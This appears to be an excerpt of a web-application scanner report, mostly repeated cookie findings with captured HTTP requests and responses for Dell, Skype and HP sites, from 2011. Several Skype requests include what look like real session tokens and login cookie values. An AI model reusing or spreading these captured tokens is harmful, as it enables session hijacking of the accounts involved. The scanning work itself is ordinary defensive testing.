Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:19 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>TVs - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?category_id= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:14 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Electr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88780
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:30 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/memconfig.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:58 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Comput ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Printe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sna/productdetail.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 149
Content-Type: text/html; charset=utf-8
Location: /sna/productnotfound.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:44 GMT
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop a ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/English/ct-p/English?profile.language=en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: community.skype.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: h30434.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1
Host: login.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:13:41 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:20:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 68855
// menu definition for c=us&l=en&s=bsd&cs=04 // var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:19:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/
Vary: Accept-Encoding
Content-Length: 90930
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
<TITLE>xss - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/help HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:03:33 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com;
Location: https://support.skype.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1
User-Agent: Skype Upgrade
Host: ui.skype.com
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:04:44 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com;
Location: http://download.skype.com/SkypeSetupFull.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1
User-Agent: Skype. 5.5
Host: ui.skype.com
Pragma: no-cache
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:58:15 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com;
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:08:54 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/apps
Content-Length: 0
Connection: close
